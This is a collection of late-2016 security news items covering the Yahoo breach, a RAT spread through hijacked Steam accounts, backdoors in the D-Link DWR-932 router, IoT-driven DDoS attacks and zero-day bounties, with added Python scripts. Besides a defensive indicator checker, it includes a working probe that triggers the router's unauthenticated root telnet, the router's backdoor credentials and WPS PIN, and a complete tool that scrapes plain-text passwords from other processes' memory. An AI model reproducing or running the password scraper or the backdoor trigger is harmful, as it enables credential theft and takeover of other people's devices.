Uh oh, Yahoo! Data Breach May Have Hit Over 1 Billion Users

The massive data breach that Yahoo! confirmed to the world last week is claimed by the company to have been carried out by a "state-sponsored actor" in 2014 and to have exposed the accounts of at least 500 million Yahoo users. But it now seems that Yahoo has downplayed a mega data breach and is trying to hide its own security blunder. Recently the information security firm InfoArmor that analyzed

Watch out, hacked Steam accounts used as an attack vector

A malware researcher spotted a Reddit post warning that hacked Steam accounts are being used to spread a Remote Access Trojan (RAT).

This week the popular malware researcher Lawrence Abrams from BleepingComputer.com found a worrisome message on Reddit. The Reddit user with the moniker Haydaddict was warning of the existence of compromised Steam accounts spreading a Remote Access Trojan (RAT).

“Quinn Lobdell hacked on Steam. Please be aware if others try to send you sketchy links. Scrub Killa and Jessie affected as well.” reads the post.

The hijacked accounts were used to send chat messages containing links to videomeo.pw, supposedly to watch a video.


“When the target went to the page, they would be greeted with a message stating that they needed to update Flash Player in order to watch the video.” explained Lawrence Abrams in a blog post.


The trick is simple and relies on the victim's curiosity: when the bogus Flash Player installer is downloaded and executed, apparently nothing happens, but in reality the victim has just opened the machine to the attacker.

The fake Flash Player installer runs a PowerShell script (zaga.ps1) that downloads a 7-Zip archive, the 7-Zip extractor and a CMD script from a remote server (http://zahr[.]pw).

The PowerShell script then launches the CMD file, which extracts the sharchivedmngr archive into the %AppData%\lappclimtfldr folder and configures Windows to start, whenever the victim logs in, a copy of the NetSupport Manager Remote Control software renamed mcrtvclient.exe.

When the victim logs in to the infected machine, NetSupport Manager connects to the NetSupport gateway at leyv.pw:11678 and awaits commands; at that point the attacker has complete control over the victim's machine.

“For those who are concerned they are infected with this Steam Trojan, I suggest they check the %AppData% folder for the specified folders.” suggests Lawrence Abrams in order to check if the system is compromised.
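The check Abrams suggests can be scripted. The following is an added example written for this article, not code from BleepingComputer or from the malware itself: it looks for the indicators named above (the %AppData%\lappclimtfldr folder, the renamed client mcrtvclient.exe, the gateway leyv.pw:11678 and the zahr.pw and videomeo.pw domains) in the Run/RunOnce keys, the profile folder and connection listings. The Run/RunOnce keys are an assumption: the write-up says the RAT starts at logon but does not name the exact autostart mechanism, so the usual suspects are checked. The matching functions are pure Python and run anywhere; only the registry reader needs Windows.

```python
"""Host check for the Steam-spread NetSupport RAT (added example, not Abrams' code).

Indicators come from the write-up: the %AppData%\\lappclimtfldr folder, the renamed
NetSupport client mcrtvclient.exe, the gateway leyv.pw:11678 and the lure/staging
domains videomeo.pw and zahr.pw. Only read_windows_autoruns() needs Windows.
"""
import os
import sys
from pathlib import Path

IOC_FOLDER = "lappclimtfldr"
IOC_BINARY = "mcrtvclient.exe"
IOC_HOSTS = ("leyv.pw", "zahr.pw", "videomeo.pw")
IOC_GATEWAY_PORT = ":11678"

# Assumption: the article says the RAT starts "when the victim logs in" without
# naming the mechanism, so the common Run/RunOnce autostart keys are inspected.
RUN_KEYS = (
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
)


def check_autoruns(entries):
    """entries: iterable of (value_name, command) pairs from autostart keys.
    Returns the pairs whose command references the RAT folder or binary."""
    hits = []
    for name, command in entries:
        low = command.lower()
        if IOC_FOLDER in low or IOC_BINARY in low:
            hits.append((name, command))
    return hits


def check_appdata(appdata_dir):
    """Returns the IOC paths that actually exist below appdata_dir."""
    folder = Path(appdata_dir) / IOC_FOLDER
    found = []
    if folder.is_dir():
        found.append(str(folder))
        if (folder / IOC_BINARY).is_file():
            found.append(str(folder / IOC_BINARY))
    return found


def check_connections(lines):
    """lines: text lines from e.g. `netstat -ano` or a proxy log.
    Returns the lines naming the gateway/lure hosts or the gateway port."""
    return [ln for ln in lines
            if any(h in ln.lower() for h in IOC_HOSTS) or IOC_GATEWAY_PORT in ln]


def read_windows_autoruns():
    """Collects (value_name, command) pairs from HKCU and HKLM Run keys (Windows only)."""
    import winreg
    entries = []
    for hive in (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE):
        for subkey in RUN_KEYS:
            try:
                key = winreg.OpenKey(hive, subkey)
            except OSError:
                continue
            with key:
                index = 0
                while True:
                    try:
                        name, value, _ = winreg.EnumValue(key, index)
                    except OSError:  # ERROR_NO_MORE_ITEMS ends the enumeration
                        break
                    entries.append((name, str(value)))
                    index += 1
    return entries


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the Windows host you want to check")
    findings = check_autoruns(read_windows_autoruns()) + check_appdata(os.environ["APPDATA"])
    print("no indicators found" if not findings else "\n".join(map(str, findings)))
```

Feed `check_connections()` the output of `netstat -ano` to catch a client that is already talking to the gateway; a hit in any of the three checks is reason to pull the machine off the network rather than just delete the folder, since the operator has had full remote control of it.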

Be careful every time you open a link, even one sent from a friend's account, and make sure your defenses are installed and up to date.

Pierluigi Paganini

(Security Affairs – Hacked Steam accounts, malware)

The post Watch out, hacked Steam accounts used as an attack vector appeared first on Security Affairs.

D-Link DWR-932 B LTE Wireless router affected by multiple backdoors

If you have a D-Link DWR-932 B LTE Wireless router you need to know that it is affected by more than 20 security issues, including backdoor accounts.

D-Link's DWR-932B LTE router and access point has been found to contain a number of backdoors as well as a default WPS (Wi-Fi Protected Setup) PIN.

Security researcher and blogger, Pierre Kim, has uncovered a number of security flaws in the device that even affect the latest version of its firmware.

Kim had previously disclosed a number of flaws in the LTE QDH routers made by Quanta, and the same flaws also appear in the D-Link model.

Among the vulnerabilities, the researcher found two backdoor accounts that can be used to bypass HTTP authentication: an 'admin' account with the password 'admin' and a 'root' account with the password '1234'.

The D-Link DWR-932 B also contains a default WPS PIN of 28296607, hard-coded in the /bin/appmgr binary. It is also present in the HostAP and HTTP API configurations.

The /bin/appmgr program also listens on UDP port 39889, bound to 0.0.0.0 (i.e. on every interface). When it receives the string HELODBC it starts a telnet service that requires no authentication, even if telnet was not already running, and the attacker gets a root shell on the router.
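The trigger is simple enough that a one-off check for your own device fits in a few lines. The script below is an added example, not part of Kim's advisory: it records whether TCP/23 is reachable, sends HELODBC to UDP/39889 and checks TCP/23 again, so a device is reported as affected only when the datagram actually opened the port. The trigger string and the UDP port come from the advisory; the use of port 23 for the spawned telnet service and the one-second settle time are assumptions. Point it only at a router you own or are authorised to test.

```python
"""Probe for the DWR-932 /bin/appmgr telnet trigger (added example, not Kim's code).

Sends HELODBC to UDP/39889 and reports whether the telnet port changed from
closed to open. Port 23 for the spawned telnetd is an assumption; the trigger
string and UDP port are from the advisory.
"""
import socket
import sys
import time

TRIGGER = b"HELODBC"
TRIGGER_PORT = 39889
TELNET_PORT = 23


def tcp_port_open(host, port, timeout=2.0):
    """True if a TCP connect to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_trigger(host, timeout=2.0):
    """Fire the UDP trigger; True if the datagram was accepted by the local stack."""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.settimeout(timeout)
            sock.sendto(TRIGGER, (host, TRIGGER_PORT))
        return True
    except OSError:
        return False


def probe_helodbc(host, timeout=2.0, settle=1.0):
    """Before/after view of the telnet port around the trigger.

    'affected' is True only when telnet was closed, the trigger was sent and
    telnet is open afterwards; a port that was already open proves nothing
    about the appmgr bug (telnet may simply be enabled on the device)."""
    before = tcp_port_open(host, TELNET_PORT, timeout)
    sent = send_trigger(host, timeout)
    if sent and not before:
        time.sleep(settle)  # give appmgr a moment to spawn telnetd
    after = tcp_port_open(host, TELNET_PORT, timeout)
    return {
        "telnet_before": before,
        "trigger_sent": sent,
        "telnet_after": after,
        "affected": sent and not before and after,
    }


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: probe.py <router-ip>  (only against devices you are authorised to test)")
    result = probe_helodbc(sys.argv[1])
    for key, value in result.items():
        print(f"{key:14} {value}")
```

A False result is not a clean bill of health: the router may filter the probe from the interface you are on, or the daemon may take longer than the settle time to start. A True result means anyone on a network the router faces, including the cellular side if the provider does not filter it, gets root without a password.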

Both /etc/inadyn-mt.conf and /bin/qmiweb contain vulnerabilities: the configuration file holds a username with a hard-coded password, and the HTTP daemon in qmiweb has multiple exploitable flaws.


Kim also discovered hard-coded user credentials for the FOTA (Firmware Over The Air) service in the /sbin/fotad binary. There is an added degree of security in that the daemon attempts to download the firmware over HTTPS, but the SSL certificate for this service has been invalid for over 18 months.

The security level of the UPnP daemon (miniupnpd) on the router is also lowered, allowing a LAN-based attacker to add port forwarding rules from the Internet to other local clients.

“There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” explained Kim.

This allows attackers to forward traffic from the outside onto the local network, including to services such as mail, file transfer and databases, providing a huge number of vehicles for advanced persistent threats.
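To see why an empty permission section is the problem, it helps to model how miniupnpd applies its rules. The following is an added example written for this article, not code from D-Link's firmware or from the miniupnpd project: it evaluates port-mapping requests against rules in miniupnpd.conf syntax (`allow|deny <ext-ports> <internal-net>/<mask> <int-ports>`, tried in order, first match wins, and a request matched by no rule is accepted). The HARDENED rule set is the stock example the miniupnpd configuration suggests; the UNRESTRICTED one is the state Kim describes, with no rules at all.

```python
"""Model of miniupnpd's permission check for AddPortMapping (added example).

Rule syntax (miniupnpd.conf):  allow|deny <ext_range> <addr>/<mask> <int_range>
Rules are evaluated in order, first match decides, and when nothing matches the
mapping is accepted. With no rules, as on the DWR-932, any LAN host can have
external port 25, 445 or 3306 forwarded to itself.
"""
import ipaddress


def _port_range(spec):
    """'1024-65535' -> (1024, 65535); a bare '80' -> (80, 80)."""
    lo, _, hi = spec.partition("-")
    lo, hi = int(lo), int(hi) if hi else int(lo)
    if not 0 <= lo <= hi <= 65535:
        raise ValueError(f"bad port range {spec!r}")
    return lo, hi


def parse_rules(text):
    """Parses the permission lines of a miniupnpd.conf fragment."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 4 or parts[0] not in ("allow", "deny"):
            raise ValueError(f"bad rule: {raw!r}")
        action, ext, net, internal = parts
        rules.append((action, _port_range(ext),
                      ipaddress.ip_network(net, strict=False), _port_range(internal)))
    return rules


def mapping_allowed(rules, ext_port, int_addr, int_port):
    """First matching rule decides; no match means accept (miniupnpd's default)."""
    addr = ipaddress.ip_address(int_addr)
    for action, (elo, ehi), net, (ilo, ihi) in rules:
        if elo <= ext_port <= ehi and addr in net and ilo <= int_port <= ihi:
            return action == "allow"
    return True


UNRESTRICTED = ""  # no permission rules at all: every request is accepted

HARDENED = """
# high ports only, LAN clients only; everything else, including ports < 1024, is refused
allow 1024-65535 192.168.1.0/24 1024-65535
deny 0-65535 0.0.0.0/0 0-65535
"""

if __name__ == "__main__":
    for label, text in (("unrestricted", UNRESTRICTED), ("hardened", HARDENED)):
        rules = parse_rules(text)
        print(label, "SMTP->LAN host:", mapping_allowed(rules, 25, "192.168.1.10", 25),
              "8080->LAN host:", mapping_allowed(rules, 8080, "192.168.1.10", 8080))
```

The point of the trailing `deny 0-65535 0.0.0.0/0 0-65535` line is to turn miniupnpd's accept-by-default into deny-by-default, so that only the explicitly allowed high ports can ever be exposed; a configuration that relies on the default, as this router does, allows everything.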

Kim informed D-Link of the issues in the DWR-932 devices back in June of this year but to date has not received any notification confirming that they have been resolved. After 90 days of silence from D-Link, Kim chose to publish an advisory revealing the bugs.

In August D-Link patched a number of flaws in its DIR model routers, after a vulnerability first found in a D-Link Wi-Fi camera proved to be present in over 120 of the company's products.

Written by: Steven Boyd


Steven is a security consultant, researcher, ethical hacker and freelance writer with over 16 years of experience in the industry. He has provided security consultancy to some of the world’s biggest banks, the private sector as well as public services and defense. He is the owner and creator of security blog www.CybrViews.com.

Twitter: @CybrViews


Pierluigi Paganini

(Security Affairs – D-Link DWR-932, Hacking)


The Good, the Bad and the Ugly - DDoS Attacks in the Era of IoT


Starting September 21, renowned security blogger Brian Krebs came under what would turn out to be one of the largest DDoS attacks to date. The attack reportedly peaked at 620 gigabits per second (Gbps) and was sustained over a number of days. It took a significant toll, and in the end forced the reporter to choose between changing hosts or shutting his blog down completely.

It appears that the Internet of Things (IoT) played a prominent role in this DDoS attack, and IoT is seen as having an increasing role in DDoS attacks overall. On the macro level, the IoT brings good with it: it provides new services that improve our everyday lives. But the technology has its bad side too, in this case the inherent weakness built into the IoT by virtue of little, often non-existent, security.

The ability to conduct DDoS attacks is premised on a hacker's ability to infect a large number of endpoints, turn the average computer into a zombie, and use it in a botnet army. While there are numerous methods for infecting computers, from phishing with malicious links to drive-by downloads, infected USB sticks and more, it still takes both cost and effort to build a botnet, add to its ranks, foster its growth, and conduct the attacks themselves.

This is because most computer endpoints have some form of anti-virus or anti-malware technology on them, with varying degrees of effectiveness, and it typically takes human intervention to open the door and infect the endpoint. The birth and ongoing development of IoT is changing that equation. Most IoT devices have no built-in security beyond a password, and as Imperva discovered while researching an attack conducted via IoT devices (CCTV cameras), the devices were all accessible via their default password. Furthermore, these devices typically provide remote access to users through default ports such as HTTP on port 80, which are easily discovered and which bridge the public Internet to the local CCTV network.

Many IoT device users don’t change default credentials, which makes the work of bad actors much easier. To discover the IoT devices, hackers need only use a search engine for internet-connected devices such as Shodan. Next, they attempt to access the devices with default credentials or use brute-force attacks to try and compromise the devices and infect them with malware.

In the case of CCTV devices, they are usually managed by a stand-alone DVR server which typically doesn’t have anti-malware protection. So once infected, the likelihood of the malware being removed from a DVR server is close to zero. Additionally, once installed these devices are almost never updated (OS fixes, BIOS updates, etc.). This all results in a very stable and cost-effective botnet. It is also likely that the outbound connection of these servers has a reasonably high bandwidth (greater than 1Mbps), contributing to the ability of hackers to ramp up the size of their DDoS attacks.

And then there’s the ugly. The Imperva report noted above mentions that in 2014 there were 245 million surveillance cameras operating around the world. Forecasts for the coming years project anywhere between 10 and 28 billion connected devices will come online by 2021. The proliferation of IoT devices and apparent ease of their compromise is making them an effective tool in the arsenal of hackers.

As billions of IoT devices come online in the years ahead, each with their own security challenges, the drafting of these devices into botnets will surge. What we are seeing now could be just the tip of the iceberg. This reduces the cost of launching and maintaining DDoS attacks while contributing to their size, and makes it more challenging for DDoS protection providers to defend against them. It could be speculated that the record-breaking size of recent DDoS attacks may be at least partially attributed to the burgeoning adoption of IoT devices and their availability to hackers who use them in these attacks. Further adding to this scourge is another threat, that of infected mobile devices, as reported in this Imperva blog.

The result is clear: attacks are scaling larger on an almost daily basis due to an expanding mix of available devices from which to launch them. Even as these words are being written, today's "largest DDoS attack ever" has become a footnote, with a just-off-the-presses report of a 1 terabit per second (Tbps) DDoS attack on French web hosting firm OVH.com, more than 60% larger than the attack on Krebs.

Concern has increased to the point that Homeland Security has just issued a call to action on IoT security. In the meantime, Brian Krebs has apparently found sanctuary thanks to Google’s Project Shield.

The challenge of DDoS protection providers is to stay ahead of bad actors and scale to meet the needs of ever increasing and sophisticated attacks, while being able to continue to protect their customers at a reasonable price, under any conditions. The increasing size of IoT will likely play an ever increasing role in the epic battle between hackers and defenders. The stakes as we can see are growing. Today hackers can shut down a journalist. Tomorrow they’ll be able to shut down hospitals, power plants, communications infrastructure and play a central role in warfare.

Don't wait until your organization gets shut down by hackers. Register here for our webinar on how to protect yourself from Multi-layered DDoS attacks. 

To view the latest Imperva DDoS Threat Landscape Report, visit https://www.incapsula.com/ddos-report/ddos-report-q1-2016.html.


Japanese man arrested for selling jailbroken iPhones

He allegedly sold iPhones with a difference - pre-jailbroken and loaded with a popular game hacked to have handy powerups built in...

mimikittenz – Extract Plain-Text Passwords From Memory

mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes. The aim of mimikittenz is to provide user-level (non-admin privileged) sensitive data extraction in order to maximise post exploitation efforts and increase value of...

Read the full post at darknet.org.uk
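The approach the tool takes, reading another process's memory as an unprivileged user and running regular expressions over it, is short enough to show end to end. The following is an added example written for this page, not mimikittenz's own code or its regex set: `iter_process_memory()` walks a target's committed regions with VirtualQueryEx and copies them with ReadProcessMemory (Windows only, and only for processes the calling user can open, which is the "user-level" constraint the post describes), while `scan_buffer()` applies the patterns and runs anywhere. The two patterns (an HTTP form login and a Basic authorization header) are illustrative assumptions chosen for the demo.

```python
"""Regex-over-process-memory in the style of mimikittenz (added example, not the tool's code).

iter_process_memory() is Windows-only (ctypes over kernel32); scan_buffer() is pure
and is exercised below on a constructed buffer. The patterns are illustrative,
not mimikittenz's own list.
"""
import re
import sys

# Assumed, illustrative patterns: a URL-encoded login form and a Basic auth header.
PATTERNS = {
    "form-login": re.compile(
        rb"(?:username|user|login)=([^&\s\x00]{1,64})&(?:password|pass|pwd)=([^&\s\x00]{1,128})"),
    "basic-auth": re.compile(rb"Authorization: Basic ([A-Za-z0-9+/=]{8,})"),
}


def scan_buffer(buf, patterns=PATTERNS):
    """Returns [(label, captured_groups)] for every pattern hit in buf."""
    hits = []
    for label, rx in patterns.items():
        for m in rx.finditer(buf):
            hits.append((label, tuple(g.decode("latin-1") for g in m.groups())))
    return hits


def iter_process_memory(pid):
    """Yields (base_address, bytes) for each committed, readable region of pid.

    Windows only: OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ), then
    VirtualQueryEx to walk regions and ReadProcessMemory to copy each one."""
    import ctypes
    from ctypes import wintypes

    PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010
    MEM_COMMIT, PAGE_NOACCESS, PAGE_GUARD = 0x1000, 0x01, 0x100

    class MEMORY_BASIC_INFORMATION(ctypes.Structure):
        _fields_ = [("BaseAddress", ctypes.c_void_p), ("AllocationBase", ctypes.c_void_p),
                    ("AllocationProtect", wintypes.DWORD), ("RegionSize", ctypes.c_size_t),
                    ("State", wintypes.DWORD), ("Protect", wintypes.DWORD),
                    ("Type", wintypes.DWORD)]

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype, k32.OpenProcess.argtypes = wintypes.HANDLE, [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.VirtualQueryEx.argtypes = [wintypes.HANDLE, ctypes.c_void_p, ctypes.POINTER(MEMORY_BASIC_INFORMATION), ctypes.c_size_t]
    k32.ReadProcessMemory.restype = wintypes.BOOL
    k32.ReadProcessMemory.argtypes = [wintypes.HANDLE, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    k32.CloseHandle.argtypes = [wintypes.HANDLE]

    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    if not handle:
        raise OSError(ctypes.get_last_error(), "OpenProcess failed (not your process, or protected)")
    try:
        mbi = MEMORY_BASIC_INFORMATION()
        addr = 0
        while k32.VirtualQueryEx(handle, addr, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            size = mbi.RegionSize
            readable = mbi.State == MEM_COMMIT and not (mbi.Protect & (PAGE_NOACCESS | PAGE_GUARD))
            if readable:
                buf = ctypes.create_string_buffer(size)
                got = ctypes.c_size_t(0)
                if k32.ReadProcessMemory(handle, addr, buf, size, ctypes.byref(got)):
                    yield addr, buf.raw[:got.value]
            addr += size
    finally:
        k32.CloseHandle(handle)


def scan_process(pid):
    """Returns [(region_base, label, groups)] across every readable region of pid."""
    return [(base, label, groups)
            for base, chunk in iter_process_memory(pid)
            for label, groups in scan_buffer(chunk)]


if __name__ == "__main__":
    if sys.platform != "win32" or len(sys.argv) != 2:
        sys.exit("usage (Windows): scan.py <pid>; scan_buffer() itself runs anywhere")
    for base, label, groups in scan_process(int(sys.argv[1])):
        print(f"{base:#014x} {label:10} {groups}")
```

Because the secrets sit in the target's own address space, nothing here needs administrator rights or a debugger; the defensive counterpart is to keep credentials out of long-lived plain-text buffers and to alert on unexpected PROCESS_VM_READ handle opens against browsers and mail clients.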

Zero day broker firm Zerodium has tripled iOS exploit bounty to $1.5M

The notorious zero-day broker Zerodium has raised its payout for a remote iOS jailbreak to $1.5 million.

The popular zero-day broker Zerodium, which buys and sells zero-day exploits, has tripled its bounty for a remote iOS 10 jailbreak. The company is now willing to pay US$1.5 million for such a vulnerability.

Zerodium first offered a bounty of US$500,000 for remote iOS 9 jailbreaks, and then paid US$1 million to a group of hackers for an iOS zero-day vulnerability that could allow an attacker to remotely hack any iPhone.

The latest offer shows the company's intent to attract bug hunters to develop remote iOS jailbreaks. Behind the decision there is a significant increase in demand for zero-day exploits for both Apple and Android mobile platforms, as confirmed by Zerodium CEO Chaouki Bekrar.

Zerodium also announced that it has doubled the reward for remote rooting flaws in the most recent Android versions, Marshmallow and Nougat: the company is willing to pay US$200,000.

Below the payout table disclosed by the Zerodium firm.

[Image: Zerodium zero-day payout table]

Zero-day exploits are valuable commodities in the hacking underground, several governments have dedicated cyber units to the discovery and exploitation of unknown vulnerabilities, but in some cases, they are sold by private entities in the criminal underground.

The rewards offered by the zero-day brokers are greater than the payouts of the vendors of the vulnerable products.

Apple's own program, for example, pays less than Zerodium: bug hunters can earn up to $200,000 for a critical vulnerability affecting the secure boot firmware components, up to $100,000 for a flaw that could be exploited to extract sensitive data protected by the Secure Enclave, up to $50,000 for arbitrary code execution with kernel privileges or unauthorized access to iCloud account data, and up to $25,000 for access from a sandboxed process to user data outside the sandbox.

Pierluigi Paganini

(Security Affairs – bug bounty program, Hacking)


Penetration Testing: Job Knowledge & Professional Development

Interested in starting a career in penetration testing? This is actually a good time to get in the field, as security has taken center stage in the IT activities of all companies and organizations and there is a demand for trained and competent pen testing experts. To join the ranks of pen testers and white-hat […]

The post Penetration Testing: Job Knowledge & Professional Development appeared first on InfoSec Resources.

Security Barriers in the Adaptation of Cloud Technology

Cloud computing adoption continues to accelerate; research by IDG found that 69% of enterprises have either applications or infrastructure running in the cloud. As organizations adopt cloud systems, they create another security threat for the future. As far as security is concerned, many organizations don't trust or rely on cloud systems. They are afraid […]


Facebook, Google, Amazon, Microsoft and IBM team up on AI

The group says it wants to ensure that AI benefits as many people as possible